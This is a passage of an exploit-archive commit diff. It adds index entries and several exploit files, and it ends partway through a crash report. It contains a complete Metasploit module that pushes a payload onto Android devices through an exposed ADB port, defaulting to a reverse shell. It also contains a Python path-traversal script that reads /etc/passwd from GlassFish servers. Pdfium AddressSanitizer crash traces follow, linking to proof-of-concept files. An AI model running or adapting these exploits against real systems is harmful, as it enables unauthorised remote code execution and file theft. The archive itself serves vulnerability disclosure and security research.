DB: 2016-01-27

15 new exploits
2016-01-27 05:03:06 +00:00 · 2016-01-27 05:03:06 +00:00 · 67dd87a6f5
commit 67dd87a6f5
parent 386bdfe50d
16 changed files with 1076 additions and 0 deletions
--- a/files.csv
+++ b/files.csv
@ -35489,6 +35489,7 @@ id,file,description,date,author,platform,type,port
 39238,platforms/php/webapps/39238.txt,"AtomCMS SQL Injection and Arbitrary File Upload Vulnerabilities",2014-07-07,"Jagriti Sahu",php,webapps,0
 39239,platforms/php/webapps/39239.txt,"xClassified 'ads.php' SQL Injection Vulnerability",2014-07-07,Lazmania61,php,webapps,0
 39240,platforms/php/webapps/39240.txt,"WordPress BSK PDF Manager Plugin 'wp-admin/admin.php' Multiple SQL Injection Vulnerabilities",2014-07-09,"Claudio Viviani",php,webapps,0
+39241,platforms/java/webapps/39241.py,"Glassfish Server - Arbitrary File Read Vulnerability",2016-01-15,bingbing,java,webapps,4848
 39242,platforms/windows/dos/39242.py,"NetSchedScan 1.0 - Crash PoC",2016-01-15,"Abraham Espinosa",windows,dos,0
 39243,platforms/php/webapps/39243.txt,"phpDolphin <= 2.0.5 - Multiple Vulnerabilities",2016-01-15,WhiteCollarGroup,php,webapps,80
 39244,platforms/linux/local/39244.txt,"Amanda <= 3.3.1 - amstar Command Injection Local Root",2016-01-15,"Hacker Fantastic",linux,local,0
@ -35517,6 +35518,7 @@ id,file,description,date,author,platform,type,port
 39271,platforms/php/webapps/39271.txt,"CMSimple Default Administrator Credentials",2014-07-28,"Govind Singh",php,webapps,0
 39272,platforms/php/webapps/39272.txt,"CMSimple Remote file Inclusion",2014-07-28,"Govind Singh",php,webapps,0
 39273,platforms/php/webapps/39273.txt,"CMSimple /2author/index.php color Parameter Remote Code Execution",2014-07-28,"Govind Singh",php,webapps,0
+39274,platforms/windows/dos/39274.py,"CesarFTP 0.99g - XCWD Denial of Service",2016-01-19,"Irving Aguilar",windows,dos,21
 39275,platforms/windows/dos/39275.txt,"PDF-XChange Viewer 2.5.315.0 - Shading Type 7 Heap Memory Corruption",2016-01-19,"Sébastien Morin",windows,dos,0
 39277,platforms/linux/local/39277.c,"Linux Kernel REFCOUNT Overflow/Use-After-Free in Keyrings",2016-01-19,"Perception Point Team",linux,local,0
 39278,platforms/hardware/remote/39278.txt,"Barracuda Web Application Firewall Authentication Bypass Vulnerability",2014-08-04,"Nick Hayes",hardware,remote,0
@ -35558,3 +35560,16 @@ id,file,description,date,author,platform,type,port
 39316,platforms/hardware/remote/39316.pl,"Multiple Aztech Modem Routers Session Hijacking Vulnerability",2014-09-15,"Eric Fajardo",hardware,remote,0
 39317,platforms/php/webapps/39317.txt,"WordPress Wordfence Security Plugin Multiple Vulnerabilities",2014-09-14,Voxel@Night,php,webapps,0
 39318,platforms/multiple/remote/39318.txt,"Laravel 'Hash::make()' Function Password Truncation Security Weakness",2014-09-16,"Pichaya Morimoto",multiple,remote,0
+39319,platforms/php/webapps/39319.txt,"Wordpress Booking Calendar Contact Form Plugin <=1.1.23 - Shortcode SQL Injection",2016-01-26,"i0akiN SEC-LABORATORY",php,webapps,80
+39320,platforms/php/webapps/39320.txt,"Gongwalker API Manager 1.1 - Blind SQL Injection",2016-01-26,HaHwul,php,webapps,80
+39321,platforms/multiple/dos/39321.txt,"pdfium - opj_jp2_apply_pclr (libopenjpeg) Heap-Based Out-of-Bounds Read",2016-01-26,"Google Security Research",multiple,dos,0
+39322,platforms/multiple/dos/39322.txt,"pdfium - opj_j2k_read_mcc (libopenjpeg) Heap-Based Out-of-Bounds Read",2016-01-26,"Google Security Research",multiple,dos,0
+39323,platforms/multiple/dos/39323.txt,"Wireshark - iseries_check_file_type Stack-Based Out-of-Bounds Read",2016-01-26,"Google Security Research",multiple,dos,0
+39324,platforms/multiple/dos/39324.txt,"Wireshark - dissect_nhdr_extopt Stack-Based Buffer Overflow",2016-01-26,"Google Security Research",multiple,dos,0
+39325,platforms/multiple/dos/39325.txt,"Wireshark - hiqnet_display_data Static Out-of-Bounds Read",2016-01-26,"Google Security Research",multiple,dos,0
+39326,platforms/multiple/dos/39326.txt,"Wireshark - nettrace_3gpp_32_423_file_open Stack-Based Out-of-Bounds Read",2016-01-26,"Google Security Research",multiple,dos,0
+39327,platforms/multiple/dos/39327.txt,"Wireshark dissect_ber_constrained_bitstring Heap-Based Out-of-Bounds Read",2016-01-26,"Google Security Research",multiple,dos,0
+39328,platforms/android/remote/39328.rb,"Android ADB Debug Server Remote Payload Execution",2016-01-26,metasploit,android,remote,5555
+39329,platforms/windows/dos/39329.py,"InfraRecorder '.m3u' File Buffer Overflow Vulnerability",2014-05-25,"Osanda Malith",windows,dos,0
+39330,platforms/windows/dos/39330.txt,"Foxit Reader <= 7.2.8.1124 - PDF Parsing Memory Corruption",2016-01-26,"Francis Provencher",windows,dos,0
+39331,platforms/windows/dos/39331.pl,"Tftpd32 and Tftpd64 Denial Of Service Vulnerability",2014-05-14,j0s3h4x0r,windows,dos,0
--- a/platforms/android/remote/39328.rb
+++ b/platforms/android/remote/39328.rb
@ -0,0 +1,85 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'rex/proto/adb'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::Tcp
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Android ADB Debug Server Remote Payload Execution',
+      'Description'    => %q{
+        Writes and spawns a native payload on an android device that is listening
+        for adb debug messages.
+      },
+      'Author'         => ['joev'],
+      'License'        => MSF_LICENSE,
+      'DefaultOptions' => { 'PAYLOAD' => 'linux/armle/shell_reverse_tcp' },
+      'Platform'       => 'linux',
+      'Arch'           => [ARCH_ARMLE, ARCH_X86, ARCH_X86_64, ARCH_MIPSLE],
+      'Targets'        => [
+        ['armle',  {'Arch' => ARCH_ARMLE}],
+        ['x86',    {'Arch' => ARCH_X86}],
+        ['x64',    {'Arch' => ARCH_X86_64}],
+        ['mipsle', {'Arch' => ARCH_MIPSLE}]
+      ],
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => 'Jan 01 2016'
+    ))
+
+    register_options([
+      Opt::RPORT(5555),
+      OptString.new('WritableDir', [true, 'Writable directory', '/data/local/tmp/'])
+    ], self.class)
+  end
+
+  def check
+    setup_adb_connection do
+      device_info = @adb_client.connect.data
+      print_good "Detected device:\n#{device_info}"
+      return Exploit::CheckCode::Vulnerable
+    end
+
+    Exploit::CheckCode::Unknown
+  end
+
+  def execute_command(cmd, opts)
+    response = @adb_client.exec_cmd(cmd)
+    print_good "Command executed, response:\n #{response}"
+  end
+
+  def exploit
+    setup_adb_connection do
+      device_data = @adb_client.connect
+      print_good "Connected to device:\n#{device_data.data}"
+      execute_cmdstager({
+        flavor: :echo,
+        enc_format: :octal,
+        prefix: '\\\\0',
+        temp: datastore['WritableDir'],
+        linemax: Rex::Proto::ADB::Message::Connect::DEFAULT_MAXDATA-8,
+        background: true,
+        nodelete: true
+      })
+    end
+  end
+
+  def setup_adb_connection(&blk)
+    begin
+      print_status "Connecting to device..."
+      connect
+      @adb_client = Rex::Proto::ADB::Client.new(sock)
+      blk.call
+    ensure
+      disconnect
+    end
+  end
+
+end
--- a/platforms/java/webapps/39241.py
+++ b/platforms/java/webapps/39241.py
@ -0,0 +1,13 @@
+# Title: glassfish Arbitrary file read vulnerability
+# Date : 01/15/2016
+# Author: bingbing
+# Software link: https://glassfish.java.net/download.html
+# Software: GlassFish Server
+# Tested: Windows 7 SP1 64bits
+
+
+#!/usr/bin/python
+import urllib2
+response=urllib2.urlopen('http://localhost:4848/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd')
+s=response.read()
+print s
--- a/platforms/multiple/dos/39321.txt
+++ b/platforms/multiple/dos/39321.txt
@ -0,0 +1,103 @@
+Source: https://code.google.com/p/google-security-research/issues/detail?id=626
+
+The following crash was encountered in pdfium (the Chrome PDF renderer) during PDF fuzzing:
+
+--- cut ---
+==9326==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6250001bf680 at pc 0x000000892375 bp 0x7ffca7393ea0 sp 0x7ffca7393e98
+READ of size 4 at 0x6250001bf680 thread T0
+    #0 0x892374 in opj_jp2_apply_pclr third_party/pdfium/third_party/libopenjpeg20/jp2.c:1018:18
+    #1 0x88d536 in opj_jp2_decode third_party/pdfium/third_party/libopenjpeg20/jp2.c:1512:5
+    #2 0x8580f6 in opj_decode third_party/pdfium/third_party/libopenjpeg20/openjpeg.c:412:10
+    #3 0x5d8c02 in CJPX_Decoder::Init(unsigned char const*, unsigned int) third_party/pdfium/core/src/fxcodec/codec/fx_codec_jpx_opj.cpp:742:11
+    #4 0x5dc7d0 in CCodec_JpxModule::CreateDecoder(unsigned char const*, unsigned int, bool) third_party/pdfium/core/src/fxcodec/codec/fx_codec_jpx_opj.cpp:866:10
+    #5 0xb9909c in decoder third_party/pdfium/core/src/fpdfapi/fpdf_render/fpdf_render_loadimage.cpp:75:36
+    #6 0xb9909c in CPDF_DIBSource::LoadJpxBitmap() third_party/pdfium/core/src/fpdfapi/fpdf_render/fpdf_render_loadimage.cpp:698
+    #7 0xb917d3 in CPDF_DIBSource::CreateDecoder() third_party/pdfium/core/src/fpdfapi/fpdf_render/fpdf_render_loadimage.cpp:645:5
+    #8 0xb8c8af in CPDF_DIBSource::StartLoadDIBSource(CPDF_Document*, CPDF_Stream const*, int, CPDF_Dictionary*, CPDF_Dictionary*, int, unsigned int, int) third_party/pdfium/core/src/fpdfapi/fpdf_render/fpdf_render_loadimage.cpp:365:13
+    #9 0xb75b33 in CPDF_ImageCache::StartGetCachedBitmap(CPDF_Dictionary*, CPDF_Dictionary*, int, unsigned int, int, CPDF_RenderStatus*, int, int) third_party/pdfium/core/src/fpdfapi/fpdf_render/fpdf_render_cache.cpp:308:7
+    #10 0xb75693 in CPDF_PageRenderCache::StartGetCachedBitmap(CPDF_Stream*, int, unsigned int, int, CPDF_RenderStatus*, int, int) third_party/pdfium/core/src/fpdfapi/fpdf_render/fpdf_render_cache.cpp:143:13
+    #11 0xba9823 in CPDF_ProgressiveImageLoaderHandle::Start(CPDF_ImageLoader*, CPDF_ImageObject const*, CPDF_PageRenderCache*, int, unsigned int, int, CPDF_RenderStatus*, int, int) third_party/pdfium/core/src/fpdfapi/fpdf_render/fpdf_render_loadimage.cpp:1561:11
+    #12 0xbaa67e in CPDF_ImageLoader::StartLoadImage(CPDF_ImageObject const*, CPDF_PageRenderCache*, void*&, int, unsigned int, int, CPDF_RenderStatus*, int, int) third_party/pdfium/core/src/fpdfapi/fpdf_render/fpdf_render_loadimage.cpp:1639:17
+    #13 0xb7d368 in CPDF_ImageRenderer::StartLoadDIBSource() third_party/pdfium/core/src/fpdfapi/fpdf_render/fpdf_render_image.cpp:337:7
+    #14 0xb77897 in CPDF_ImageRenderer::Start(CPDF_RenderStatus*, CPDF_PageObject const*, CFX_Matrix const*, int, int) third_party/pdfium/core/src/fpdfapi/fpdf_render/fpdf_render_image.cpp:484:7
+    #15 0xb64fb6 in CPDF_RenderStatus::ContinueSingleObject(CPDF_PageObject const*, CFX_Matrix const*, IFX_Pause*) third_party/pdfium/core/src/fpdfapi/fpdf_render/fpdf_render.cpp:320:10
+    #16 0xb70a25 in CPDF_ProgressiveRenderer::Continue(IFX_Pause*) third_party/pdfium/core/src/fpdfapi/fpdf_render/fpdf_render.cpp:1152:13
+    #17 0xb6f633 in CPDF_ProgressiveRenderer::Start(IFX_Pause*) third_party/pdfium/core/src/fpdfapi/fpdf_render/fpdf_render.cpp:1090:3
+    #18 0x52c1f1 in FPDF_RenderPage_Retail(CRenderContext*, void*, int, int, int, int, int, int, int, IFSDK_PAUSE_Adapter*) third_party/pdfium/fpdfsdk/src/fpdfview.cpp:752:3
+    #19 0x52b7fb in FPDF_RenderPageBitmap third_party/pdfium/fpdfsdk/src/fpdfview.cpp:507:3
+    #20 0x4dae22 in RenderPage(std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char> > const&, void* const&, void* const&, int, Options const&) third_party/pdfium/samples/pdfium_test.cc:363:3
+    #21 0x4dd558 in RenderPdf(std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char> > const&, char const*, unsigned long, Options const&) third_party/pdfium/samples/pdfium_test.cc:520:9
+    #22 0x4de3d1 in main third_party/pdfium/samples/pdfium_test.cc:597:5
+0x6250001bf680 is located 0 bytes to the right of 9600-byte region [0x6250001bd100,0x6250001bf680)
+allocated by thread T0 here:
+    #0 0x4b0154 in __interceptor_calloc
+    #1 0x88219f in opj_j2k_update_image_data third_party/pdfium/third_party/libopenjpeg20/j2k.c:8157:57
+    #2 0x8817d7 in opj_j2k_decode_tiles third_party/pdfium/third_party/libopenjpeg20/j2k.c:9603:23
+    #3 0x869d57 in opj_j2k_exec third_party/pdfium/third_party/libopenjpeg20/j2k.c:7286:41
+    #4 0x869d57 in opj_j2k_decode third_party/pdfium/third_party/libopenjpeg20/j2k.c:9796
+    #5 0x88d234 in opj_jp2_decode third_party/pdfium/third_party/libopenjpeg20/jp2.c:1483:8
+    #6 0x8580f6 in opj_decode third_party/pdfium/third_party/libopenjpeg20/openjpeg.c:412:10
+    #7 0x5d8c02 in CJPX_Decoder::Init(unsigned char const*, unsigned int) third_party/pdfium/core/src/fxcodec/codec/fx_codec_jpx_opj.cpp:742:11
+    #8 0x5dc7d0 in CCodec_JpxModule::CreateDecoder(unsigned char const*, unsigned int, bool) third_party/pdfium/core/src/fxcodec/codec/fx_codec_jpx_opj.cpp:866:10
+    #9 0xb9909c in decoder third_party/pdfium/core/src/fpdfapi/fpdf_render/fpdf_render_loadimage.cpp:75:36
+    #10 0xb9909c in CPDF_DIBSource::LoadJpxBitmap() third_party/pdfium/core/src/fpdfapi/fpdf_render/fpdf_render_loadimage.cpp:698
+    #11 0xb917d3 in CPDF_DIBSource::CreateDecoder() third_party/pdfium/core/src/fpdfapi/fpdf_render/fpdf_render_loadimage.cpp:645:5
+    #12 0xb8c8af in CPDF_DIBSource::StartLoadDIBSource(CPDF_Document*, CPDF_Stream const*, int, CPDF_Dictionary*, CPDF_Dictionary*, int, unsigned int, int) third_party/pdfium/core/src/fpdfapi/fpdf_render/fpdf_render_loadimage.cpp:365:13
+    #13 0xb75b33 in CPDF_ImageCache::StartGetCachedBitmap(CPDF_Dictionary*, CPDF_Dictionary*, int, unsigned int, int, CPDF_RenderStatus*, int, int) third_party/pdfium/core/src/fpdfapi/fpdf_render/fpdf_render_cache.cpp:308:7
+    #14 0xb75693 in CPDF_PageRenderCache::StartGetCachedBitmap(CPDF_Stream*, int, unsigned int, int, CPDF_RenderStatus*, int, int) third_party/pdfium/core/src/fpdfapi/fpdf_render/fpdf_render_cache.cpp:143:13
+    #15 0xba9823 in CPDF_ProgressiveImageLoaderHandle::Start(CPDF_ImageLoader*, CPDF_ImageObject const*, CPDF_PageRenderCache*, int, unsigned int, int, CPDF_RenderStatus*, int, int) third_party/pdfium/core/src/fpdfapi/fpdf_render/fpdf_render_loadimage.cpp:1561:11
+    #16 0xbaa67e in CPDF_ImageLoader::StartLoadImage(CPDF_ImageObject const*, CPDF_PageRenderCache*, void*&, int, unsigned int, int, CPDF_RenderStatus*, int, int) third_party/pdfium/core/src/fpdfapi/fpdf_render/fpdf_render_loadimage.cpp:1639:17
+    #17 0xb7d368 in CPDF_ImageRenderer::StartLoadDIBSource() third_party/pdfium/core/src/fpdfapi/fpdf_render/fpdf_render_image.cpp:337:7
+    #18 0xb77897 in CPDF_ImageRenderer::Start(CPDF_RenderStatus*, CPDF_PageObject const*, CFX_Matrix const*, int, int) third_party/pdfium/core/src/fpdfapi/fpdf_render/fpdf_render_image.cpp:484:7
+    #19 0xb64fb6 in CPDF_RenderStatus::ContinueSingleObject(CPDF_PageObject const*, CFX_Matrix const*, IFX_Pause*) third_party/pdfium/core/src/fpdfapi/fpdf_render/fpdf_render.cpp:320:10
+    #20 0xb70a25 in CPDF_ProgressiveRenderer::Continue(IFX_Pause*) third_party/pdfium/core/src/fpdfapi/fpdf_render/fpdf_render.cpp:1152:13
+    #21 0xb6f633 in CPDF_ProgressiveRenderer::Start(IFX_Pause*) third_party/pdfium/core/src/fpdfapi/fpdf_render/fpdf_render.cpp:1090:3
+    #22 0x52c1f1 in FPDF_RenderPage_Retail(CRenderContext*, void*, int, int, int, int, int, int, int, IFSDK_PAUSE_Adapter*) third_party/pdfium/fpdfsdk/src/fpdfview.cpp:752:3
+    #23 0x52b7fb in FPDF_RenderPageBitmap third_party/pdfium/fpdfsdk/src/fpdfview.cpp:507:3
+    #24 0x4dae22 in RenderPage(std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char> > const&, void* const&, void* const&, int, Options const&) third_party/pdfium/samples/pdfium_test.cc:363:3
+    #25 0x4dd558 in RenderPdf(std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char> > const&, char const*, unsigned long, Options const&) third_party/pdfium/samples/pdfium_test.cc:520:9
+    #26 0x4de3d1 in main third_party/pdfium/samples/pdfium_test.cc:597:5
+
+SUMMARY: AddressSanitizer: heap-buffer-overflow (pdfium_test+0x892374)
+Shadow bytes around the buggy address:
+  0x0c4a8002fe80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+  0x0c4a8002fe90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+  0x0c4a8002fea0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+  0x0c4a8002feb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+  0x0c4a8002fec0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+=>0x0c4a8002fed0:[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+  0x0c4a8002fee0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+  0x0c4a8002fef0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+  0x0c4a8002ff00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+  0x0c4a8002ff10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+  0x0c4a8002ff20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+Shadow byte legend (one shadow byte represents 8 application bytes):
+  Addressable:           00
+  Partially addressable: 01 02 03 04 05 06 07
+  Heap left redzone:       fa
+  Heap right redzone:      fb
+  Freed heap region:       fd
+  Stack left redzone:      f1
+  Stack mid redzone:       f2
+  Stack right redzone:     f3
+  Stack partial redzone:   f4
+  Stack after return:      f5
+  Stack use after scope:   f8
+  Global redzone:          f9
+  Global init order:       f6
+  Poisoned by user:        f7
+  Container overflow:      fc
+  Array cookie:            ac
+  Intra object redzone:    bb
+  ASan internal:           fe
+  Left alloca redzone:     ca
+  Right alloca redzone:    cb
+==9326==ABORTING
+--- cut ---
+
+The crash was reported at https://code.google.com/p/chromium/issues/detail?id=554172. Attached is a PDF file which triggers the crash.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39321.zip
+
--- a/platforms/multiple/dos/39322.txt
+++ b/platforms/multiple/dos/39322.txt
@ -0,0 +1,109 @@
+Source: https://code.google.com/p/google-security-research/issues/detail?id=624
+
+The following crash was encountered in pdfium (the Chrome PDF renderer) during PDF fuzzing:
+
+--- cut ---
+$ ./pdfium_test asan_heap-oob_91e21c_3386_e3df547c206840ceb03fd7c7ca823e7a 
+Rendering PDF file asan_heap-oob_91e21c_3386_e3df547c206840ceb03fd7c7ca823e7a.
+Non-linearized path...
+=================================================================
+==28048==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61200000b400 at pc 0x000000a91f64 bp 0x7fffdebdb0f0 sp 0x7fffdebdb0e8
+READ of size 4 at 0x61200000b400 thread T0
+    #0 0xa91f63 in opj_j2k_read_mcc third_party/libopenjpeg20/j2k.c:5378:35
+    #1 0xa77265 in opj_j2k_read_header_procedure third_party/libopenjpeg20/j2k.c:7213:23
+    #2 0xa51e2c in opj_j2k_exec third_party/libopenjpeg20/j2k.c:7286:41
+    #3 0xa51467 in opj_j2k_read_header third_party/libopenjpeg20/j2k.c:6764:15
+    #4 0xac643f in opj_jp2_read_header third_party/libopenjpeg20/jp2.c:2648:9
+    #5 0xa39a8d in opj_read_header third_party/libopenjpeg20/openjpeg.c:391:10
+    #6 0x7863ca in CJPX_Decoder::Init(unsigned char const*, unsigned int) core/src/fxcodec/codec/fx_codec_jpx_opj.cpp:729:8
+    #7 0x78b63c in CCodec_JpxModule::CreateDecoder(unsigned char const*, unsigned int, bool) core/src/fxcodec/codec/fx_codec_jpx_opj.cpp:866:10
+    #8 0xec1c9b in CPDF_DIBSource::LoadJpxBitmap() core/src/fpdfapi/fpdf_render/fpdf_render_loadimage.cpp:689:24
+    #9 0xeb8296 in CPDF_DIBSource::CreateDecoder() core/src/fpdfapi/fpdf_render/fpdf_render_loadimage.cpp:645:5
+    #10 0xeb0cf9 in CPDF_DIBSource::StartLoadDIBSource(CPDF_Document*, CPDF_Stream const*, int, CPDF_Dictionary*, CPDF_Dictionary*, int, unsigned int, int) core/src/fpdfapi/fpdf_render/fpdf_render_loadimage.cpp:365:13
+    #11 0xe8a295 in CPDF_ImageCache::StartGetCachedBitmap(CPDF_Dictionary*, CPDF_Dictionary*, int, unsigned int, int, CPDF_RenderStatus*, int, int) core/src/fpdfapi/fpdf_render/fpdf_render_cache.cpp:308:7
+    #12 0xe89a99 in CPDF_PageRenderCache::StartGetCachedBitmap(CPDF_Stream*, int, unsigned int, int, CPDF_RenderStatus*, int, int) core/src/fpdfapi/fpdf_render/fpdf_render_cache.cpp:143:13
+    #13 0xed4f7e in CPDF_ProgressiveImageLoaderHandle::Start(CPDF_ImageLoader*, CPDF_ImageObject const*, CPDF_PageRenderCache*, int, unsigned int, int, CPDF_RenderStatus*, int, int) core/src/fpdfapi/fpdf_render/fpdf_render_loadimage.cpp:1561:11
+    #14 0xed6aaf in CPDF_ImageLoader::StartLoadImage(CPDF_ImageObject const*, CPDF_PageRenderCache*, void*&, int, unsigned int, int, CPDF_RenderStatus*, int, int) core/src/fpdfapi/fpdf_render/fpdf_render_loadimage.cpp:1639:17
+    #15 0xe96f16 in CPDF_ImageRenderer::StartLoadDIBSource() core/src/fpdfapi/fpdf_render/fpdf_render_image.cpp:337:7
+    #16 0xe8db49 in CPDF_ImageRenderer::Start(CPDF_RenderStatus*, CPDF_PageObject const*, CFX_Matrix const*, int, int) core/src/fpdfapi/fpdf_render/fpdf_render_image.cpp:484:7
+    #17 0xe67c11 in CPDF_RenderStatus::ContinueSingleObject(CPDF_PageObject const*, CFX_Matrix const*, IFX_Pause*) core/src/fpdfapi/fpdf_render/fpdf_render.cpp:320:10
+    #18 0xe76f12 in CPDF_ProgressiveRenderer::Continue(IFX_Pause*) core/src/fpdfapi/fpdf_render/fpdf_render.cpp:1152:13
+    #19 0xe756c1 in CPDF_ProgressiveRenderer::Start(IFX_Pause*) core/src/fpdfapi/fpdf_render/fpdf_render.cpp:1090:3
+    #20 0x63dbd7 in FPDF_RenderPage_Retail(CRenderContext*, void*, int, int, int, int, int, int, int, IFSDK_PAUSE_Adapter*) fpdfsdk/src/fpdfview.cpp:752:3
+    #21 0x63c3af in FPDF_RenderPageBitmap fpdfsdk/src/fpdfview.cpp:507:3
+    #22 0x4ee0df in RenderPage(std::string const&, void* const&, void* const&, int, Options const&) samples/pdfium_test.cc:374:3
+    #23 0x4f0af8 in RenderPdf(std::string const&, char const*, unsigned long, Options const&) samples/pdfium_test.cc:531:9
+    #24 0x4f16e9 in main samples/pdfium_test.cc:608:5
+
+0x61200000b400 is located 0 bytes to the right of 320-byte region [0x61200000b2c0,0x61200000b400)
+allocated by thread T0 here:
+    #0 0x4be96c in calloc llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:56
+    #1 0xa8b0b3 in opj_j2k_read_siz third_party/libopenjpeg20/j2k.c:2262:25
+    #2 0xa77265 in opj_j2k_read_header_procedure third_party/libopenjpeg20/j2k.c:7213:23
+    #3 0xa51e2c in opj_j2k_exec third_party/libopenjpeg20/j2k.c:7286:41
+    #4 0xa51467 in opj_j2k_read_header third_party/libopenjpeg20/j2k.c:6764:15
+    #5 0xac643f in opj_jp2_read_header third_party/libopenjpeg20/jp2.c:2648:9
+    #6 0xa39a8d in opj_read_header third_party/libopenjpeg20/openjpeg.c:391:10
+    #7 0x7863ca in CJPX_Decoder::Init(unsigned char const*, unsigned int) core/src/fxcodec/codec/fx_codec_jpx_opj.cpp:729:8
+    #8 0x78b63c in CCodec_JpxModule::CreateDecoder(unsigned char const*, unsigned int, bool) core/src/fxcodec/codec/fx_codec_jpx_opj.cpp:866:10
+    #9 0xec1c9b in CPDF_DIBSource::LoadJpxBitmap() core/src/fpdfapi/fpdf_render/fpdf_render_loadimage.cpp:689:24
+    #10 0xeb8296 in CPDF_DIBSource::CreateDecoder() core/src/fpdfapi/fpdf_render/fpdf_render_loadimage.cpp:645:5
+    #11 0xeb0cf9 in CPDF_DIBSource::StartLoadDIBSource(CPDF_Document*, CPDF_Stream const*, int, CPDF_Dictionary*, CPDF_Dictionary*, int, unsigned int, int) core/src/fpdfapi/fpdf_render/fpdf_render_loadimage.cpp:365:13
+    #12 0xe8a295 in CPDF_ImageCache::StartGetCachedBitmap(CPDF_Dictionary*, CPDF_Dictionary*, int, unsigned int, int, CPDF_RenderStatus*, int, int) core/src/fpdfapi/fpdf_render/fpdf_render_cache.cpp:308:7
+    #13 0xe89a99 in CPDF_PageRenderCache::StartGetCachedBitmap(CPDF_Stream*, int, unsigned int, int, CPDF_RenderStatus*, int, int) core/src/fpdfapi/fpdf_render/fpdf_render_cache.cpp:143:13
+    #14 0xed4f7e in CPDF_ProgressiveImageLoaderHandle::Start(CPDF_ImageLoader*, CPDF_ImageObject const*, CPDF_PageRenderCache*, int, unsigned int, int, CPDF_RenderStatus*, int, int) core/src/fpdfapi/fpdf_render/fpdf_render_loadimage.cpp:1561:11
+    #15 0xed6aaf in CPDF_ImageLoader::StartLoadImage(CPDF_ImageObject const*, CPDF_PageRenderCache*, void*&, int, unsigned int, int, CPDF_RenderStatus*, int, int) core/src/fpdfapi/fpdf_render/fpdf_render_loadimage.cpp:1639:17
+    #16 0xe96f16 in CPDF_ImageRenderer::StartLoadDIBSource() core/src/fpdfapi/fpdf_render/fpdf_render_image.cpp:337:7
+    #17 0xe8db49 in CPDF_ImageRenderer::Start(CPDF_RenderStatus*, CPDF_PageObject const*, CFX_Matrix const*, int, int) core/src/fpdfapi/fpdf_render/fpdf_render_image.cpp:484:7
+    #18 0xe67c11 in CPDF_RenderStatus::ContinueSingleObject(CPDF_PageObject const*, CFX_Matrix const*, IFX_Pause*) core/src/fpdfapi/fpdf_render/fpdf_render.cpp:320:10
+    #19 0xe76f12 in CPDF_ProgressiveRenderer::Continue(IFX_Pause*) core/src/fpdfapi/fpdf_render/fpdf_render.cpp:1152:13
+    #20 0xe756c1 in CPDF_ProgressiveRenderer::Start(IFX_Pause*) core/src/fpdfapi/fpdf_render/fpdf_render.cpp:1090:3
+    #21 0x63dbd7 in FPDF_RenderPage_Retail(CRenderContext*, void*, int, int, int, int, int, int, int, IFSDK_PAUSE_Adapter*) fpdfsdk/src/fpdfview.cpp:752:3
+    #22 0x63c3af in FPDF_RenderPageBitmap fpdfsdk/src/fpdfview.cpp:507:3
+    #23 0x4ee0df in RenderPage(std::string const&, void* const&, void* const&, int, Options const&) samples/pdfium_test.cc:374:3
+    #24 0x4f0af8 in RenderPdf(std::string const&, char const*, unsigned long, Options const&) samples/pdfium_test.cc:531:9
+    #25 0x4f16e9 in main samples/pdfium_test.cc:608:5
+
+SUMMARY: AddressSanitizer: heap-buffer-overflow third_party/libopenjpeg20/j2k.c:5378:35 in opj_j2k_read_mcc
+Shadow bytes around the buggy address:
+  0x0c247fff9630: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+  0x0c247fff9640: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+  0x0c247fff9650: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
+  0x0c247fff9660: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+  0x0c247fff9670: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+=>0x0c247fff9680:[fa]fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
+  0x0c247fff9690: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+  0x0c247fff96a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+  0x0c247fff96b0: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
+  0x0c247fff96c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+  0x0c247fff96d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fa fa
+Shadow byte legend (one shadow byte represents 8 application bytes):
+  Addressable:           00
+  Partially addressable: 01 02 03 04 05 06 07 
+  Heap left redzone:       fa
+  Heap right redzone:      fb
+  Freed heap region:       fd
+  Stack left redzone:      f1
+  Stack mid redzone:       f2
+  Stack right redzone:     f3
+  Stack partial redzone:   f4
+  Stack after return:      f5
+  Stack use after scope:   f8
+  Global redzone:          f9
+  Global init order:       f6
+  Poisoned by user:        f7
+  Container overflow:      fc
+  Array cookie:            ac
+  Intra object redzone:    bb
